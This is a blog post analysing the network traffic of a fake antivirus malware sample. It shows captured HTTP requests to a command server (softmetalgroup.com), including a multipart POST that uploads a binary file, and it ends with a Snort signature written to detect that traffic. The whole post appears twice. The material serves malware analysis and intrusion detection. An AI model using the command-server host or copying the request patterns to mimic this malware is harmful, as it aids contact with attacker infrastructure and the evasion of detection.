video.exe is a fake AV malware. It resolves softmetalgroup.com (195.88.190.54) and does a GET for "/check". The server returns a "200 OK", but a "404 Not Found" page is returned:
GET /check HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:38 GMT
Content-Type: application/octet-stream
Content-Length: 208
Last-Modified: Fri, 16 Oct 2009 15:35:48 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /check was not found on this server.</p>
<hr>
</body></html>
This is part of the check-in process as it doesn't match up with a proper 404 from nginx as we'll see later.
A POST comes next that pushes a binary file:
POST /loads2.php?r=56.1 HTTP/1.1
Content-Type: multipart/form-data; boundary= 82859F64871E
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Content-Length: 351
Connection: Keep-Alive
--82859F64871E
Content-Disposition: form-data; name="file"; filename="afile"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
...
--82859F64871E--HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:39 GMT
Content-Type: text/html; charset=windows-1252
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Powered-By: PHP/5.3.1
2
OK
0
I base my signature off of this request, filename, parameter name and User-Agent:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"video.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/loads2.php?r="; content:"User-Agent\: Microsoft Internet Explorer|0D 0A|"; sid:0305201001;)
Next, there are multiple GETs for "/omni.gif". The User-Agent switches to something that looks more legitimate and proper 404 errors are returned:
GET http://softmetalgroup.com/omni.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softmetalgroup.com
Connection: close
HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:12:21 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 529
Connection: close
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
...
I'm not sure if these are keep-alive requests or not.
Virustotal
ThreatExpert
mwanalysis
GET /check HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:38 GMT
Content-Type: application/octet-stream
Content-Length: 208
Last-Modified: Fri, 16 Oct 2009 15:35:48 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /check was not found on this server.</p>
<hr>
</body></html>
This is part of the check-in process as it doesn't match up with a proper 404 from nginx as we'll see later.
A POST comes next that pushes a binary file:
POST /loads2.php?r=56.1 HTTP/1.1
Content-Type: multipart/form-data; boundary= 82859F64871E
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Content-Length: 351
Connection: Keep-Alive
--82859F64871E
Content-Disposition: form-data; name="file"; filename="afile"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
...
--82859F64871E--HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:39 GMT
Content-Type: text/html; charset=windows-1252
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Powered-By: PHP/5.3.1
2
OK
0
I base my signature off of this request, filename, parameter name and User-Agent:
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"video.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/loads2.php?r="; content:"User-Agent\: Microsoft Internet Explorer|0D 0A|"; sid:0305201001;)
Next, there are multiple GETs for "/omni.gif". The User-Agent switches to something that looks more legitimate and proper 404 errors are returned:
GET http://softmetalgroup.com/omni.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softmetalgroup.com
Connection: close
HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:12:21 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 529
Connection: close
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
...
I'm not sure if these are keep-alive requests or not.
Virustotal
ThreatExpert
mwanalysis
Emerging Threats signature here.
ReplyDelete